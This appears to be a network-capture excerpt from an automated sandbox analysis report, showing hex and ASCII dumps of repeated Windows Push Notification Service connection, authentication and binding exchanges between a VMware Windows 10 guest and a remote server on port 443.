2025-01-07 15:01:09 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 37 4b 33 78 76 66 76 55 7a 30 2b 58 4e 78 52 46 6c 58 51 31 4a 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 7K3xvfvUz0+XNxRFlXQ1JQ.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.6	49752	40.113.110.67	443

Timestamp	Bytes transferred	Direction	Data
2025-01-07 15:01:18 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4e 68 32 67 35 31 65 6f 63 30 4b 6c 77 2f 4e 47 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 63 34 62 38 31 30 64 30 37 64 65 34 35 36 38 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: Nh2g51eoc0Klw/NG.1Context: 8c4b810d07de4568
2025-01-07 15:01:18 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-07 15:01:18 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 4e 68 32 67 35 31 65 6f 63 30 4b 6c 77 2f 4e 47 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 63 34 62 38 31 30 64 30 37 64 65 34 35 36 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 62 68 44 55 6b 50 71 78 56 2b 33 73 6b 6d 5a 33 65 69 6b 66 62 62 70 61 38 57 32 69 55 4d 66 33 42 5a 78 56 38 33 4d 75 73 78 6d 35 66 78 76 54 6c 6b 6d 6c 5a 6d 56 67 6e 30 6a 77 4a 61 56 48 6d 79 74 75 35 4a 6e 68 67 6a 73 53 68 47 4b 2b 6d 63 51 41 4a 59 77 58 77 77 69 47 31 6c 76 6d 2f 75 4d 54 6c 79 41 76 6b 61 37 6d 42 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: Nh2g51eoc0Klw/NG.2Context: 8c4b810d07de4568<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAbhDUkPqxV+3skmZ3eikfbbpa8W2iUMf3BZxV83Musxm5fxvTlkmlZmVgn0jwJaVHmytu5JnhgjsShGK+mcQAJYwXwwiG1lvm/uMTlyAvka7mB
2025-01-07 15:01:18 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4e 68 32 67 35 31 65 6f 63 30 4b 6c 77 2f 4e 47 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 63 34 62 38 31 30 64 30 37 64 65 34 35 36 38 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: Nh2g51eoc0Klw/NG.3Context: 8c4b810d07de4568<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-07 15:01:18 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-07 15:01:18 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 61 43 32 6d 70 52 55 58 70 55 36 4a 35 58 79 57 64 38 49 68 62 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: aC2mpRUXpU6J5XyWd8Ihbg.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.6	49849	40.113.110.67	443

Timestamp	Bytes transferred	Direction	Data
2025-01-07 15:01:33 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 31 4c 72 59 55 39 50 54 43 45 4b 51 47 6e 45 48 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 32 39 33 33 39 31 63 36 63 61 36 66 62 61 62 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: 1LrYU9PTCEKQGnEH.1Context: 6293391c6ca6fbab
2025-01-07 15:01:33 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-07 15:01:33 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 31 4c 72 59 55 39 50 54 43 45 4b 51 47 6e 45 48 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 32 39 33 33 39 31 63 36 63 61 36 66 62 61 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 62 68 44 55 6b 50 71 78 56 2b 33 73 6b 6d 5a 33 65 69 6b 66 62 62 70 61 38 57 32 69 55 4d 66 33 42 5a 78 56 38 33 4d 75 73 78 6d 35 66 78 76 54 6c 6b 6d 6c 5a 6d 56 67 6e 30 6a 77 4a 61 56 48 6d 79 74 75 35 4a 6e 68 67 6a 73 53 68 47 4b 2b 6d 63 51 41 4a 59 77 58 77 77 69 47 31 6c 76 6d 2f 75 4d 54 6c 79 41 76 6b 61 37 6d 42 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 1LrYU9PTCEKQGnEH.2Context: 6293391c6ca6fbab<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAbhDUkPqxV+3skmZ3eikfbbpa8W2iUMf3BZxV83Musxm5fxvTlkmlZmVgn0jwJaVHmytu5JnhgjsShGK+mcQAJYwXwwiG1lvm/uMTlyAvka7mB
2025-01-07 15:01:33 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 31 4c 72 59 55 39 50 54 43 45 4b 51 47 6e 45 48 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 32 39 33 33 39 31 63 36 63 61 36 66 62 61 62 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: 1LrYU9PTCEKQGnEH.3Context: 6293391c6ca6fbab<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-07 15:01:33 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-07 15:01:33 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 52 77 7a 2b 33 55 48 56 6b 45 47 66 77 63 62 66 39 65 33 39 55 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: Rwz+3UHVkEGfwcbf9e39Ug.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.6	49941	40.113.110.67	443

Timestamp	Bytes transferred	Direction	Data
2025-01-07 15:01:48 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 72 6f 34 33 79 30 42 42 34 55 32 2f 61 4b 30 33 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 64 66 32 32 33 33 31 66 35 37 39 39 31 63 64 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: ro43y0BB4U2/aK03.1Context: 5df22331f57991cd
2025-01-07 15:01:48 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-07 15:01:48 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 72 6f 34 33 79 30 42 42 34 55 32 2f 61 4b 30 33 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 64 66 32 32 33 33 31 66 35 37 39 39 31 63 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 62 68 44 55 6b 50 71 78 56 2b 33 73 6b 6d 5a 33 65 69 6b 66 62 62 70 61 38 57 32 69 55 4d 66 33 42 5a 78 56 38 33 4d 75 73 78 6d 35 66 78 76 54 6c 6b 6d 6c 5a 6d 56 67 6e 30 6a 77 4a 61 56 48 6d 79 74 75 35 4a 6e 68 67 6a 73 53 68 47 4b 2b 6d 63 51 41 4a 59 77 58 77 77 69 47 31 6c 76 6d 2f 75 4d 54 6c 79 41 76 6b 61 37 6d 42 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: ro43y0BB4U2/aK03.2Context: 5df22331f57991cd<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAbhDUkPqxV+3skmZ3eikfbbpa8W2iUMf3BZxV83Musxm5fxvTlkmlZmVgn0jwJaVHmytu5JnhgjsShGK+mcQAJYwXwwiG1lvm/uMTlyAvka7mB
2025-01-07 15:01:48 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 72 6f 34 33 79 30 42 42 34 55 32 2f 61 4b 30 33 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 64 66 32 32 33 33 31 66 35 37 39 39 31 63 64 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: ro43y0BB4U2/aK03.3Context: 5df22331f57991cd<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-07 15:01:48 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-07 15:01:48 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 31 6a 4f 74 65 2b 66 61 50 30 65 59 43 47 51 41 42 57 30 64 69 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 1jOte+faP0eYCGQABW0diA.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.6	62081	40.113.110.67	443

Timestamp	Bytes transferred	Direction	Data
2025-01-07 15:02:10 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 39 56 75 79 63 39 51 71 6d 45 32 48 4c 76 6e 55 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 63 38 38 38 64 63 37 39 30 33 62 38 66 32 33 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: 9Vuyc9QqmE2HLvnU.1Context: 2c888dc7903b8f23
2025-01-07 15:02:10 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-07 15:02:10 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 39 56 75 79 63 39 51 71 6d 45 32 48 4c 76 6e 55 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 63 38 38 38 64 63 37 39 30 33 62 38 66 32 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 62 68 44 55 6b 50 71 78 56 2b 33 73 6b 6d 5a 33 65 69 6b 66 62 62 70 61 38 57 32 69 55 4d 66 33 42 5a 78 56 38 33 4d 75 73 78 6d 35 66 78 76 54 6c 6b 6d 6c 5a 6d 56 67 6e 30 6a 77 4a 61 56 48 6d 79 74 75 35 4a 6e 68 67 6a 73 53 68 47 4b 2b 6d 63 51 41 4a 59 77 58 77 77 69 47 31 6c 76 6d 2f 75 4d 54 6c 79 41 76 6b 61 37 6d 42 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 9Vuyc9QqmE2HLvnU.2Context: 2c888dc7903b8f23<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAbhDUkPqxV+3skmZ3eikfbbpa8W2iUMf3BZxV83Musxm5fxvTlkmlZmVgn0jwJaVHmytu5JnhgjsShGK+mcQAJYwXwwiG1lvm/uMTlyAvka7mB
2025-01-07 15:02:10 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 39 56 75 79 63 39 51 71 6d 45 32 48 4c 76 6e 55 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 63 38 38 38 64 63 37 39 30 33 62 38 66 32 33 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: 9Vuyc9QqmE2HLvnU.3Context: 2c888dc7903b8f23<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-07 15:02:10 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-07 15:02:10 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 77 30 6c 75 33 78 32 72 77 6b 6d 65 54 58 74 5a 51 75 5a 30 46 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: w0lu3x2rwkmeTXtZQuZ0Fw.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.6	62084	40.113.110.67	443

Timestamp	Bytes transferred	Direction	Data
2025-01-07 15:02:40 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 64 32 4b 6c 66 37 51 6f 69 55 4b 50 69 35 78 78 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 61 30 39 33 63 61 36 66 36 63 62 31 63 63 36 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: d2Klf7QoiUKPi5xx.1Context: 6a093ca6f6cb1cc6
2025-01-07 15:02:40 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-07 15:02:40 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 64 32 4b 6c 66 37 51 6f 69 55 4b 50 69 35 78 78 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 61 30 39 33 63 61 36 66 36 63 62 31 63 63 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 62 68 44 55 6b 50 71 78 56 2b 33 73 6b 6d 5a 33 65 69 6b 66 62 62 70 61 38 57 32 69 55 4d 66 33 42 5a 78 56 38 33 4d 75 73 78 6d 35 66 78 76 54 6c 6b 6d 6c 5a 6d 56 67 6e 30 6a 77 4a 61 56 48 6d 79 74 75 35 4a 6e 68 67 6a 73 53 68 47 4b 2b 6d 63 51 41 4a 59 77 58 77 77 69 47 31 6c 76 6d 2f 75 4d 54 6c 79 41 76 6b 61 37 6d 42 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: d2Klf7QoiUKPi5xx.2Context: 6a093ca6f6cb1cc6<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAbhDUkPqxV+3skmZ3eikfbbpa8W2iUMf3BZxV83Musxm5fxvTlkmlZmVgn0jwJaVHmytu5JnhgjsShGK+mcQAJYwXwwiG1lvm/uMTlyAvka7mB
2025-01-07 15:02:40 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 64 32 4b 6c 66 37 51 6f 69 55 4b 50 69 35 78 78 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 61 30 39 33 63 61 36 66 36 63 62 31 63 63 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: d2Klf7QoiUKPi5xx.3Context: 6a093ca6f6cb1cc6<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-07 15:02:40 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-07 15:02:40 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 63 2b 52 42 6b 6d 48 59 39 6b 4f 49 50 5a 5a 6f 4f 35 56 44 2b 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: c+RBkmHY9kOIPZZoO5VD+g.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.6	62085	40.113.110.67	443

Timestamp	Bytes transferred	Direction	Data
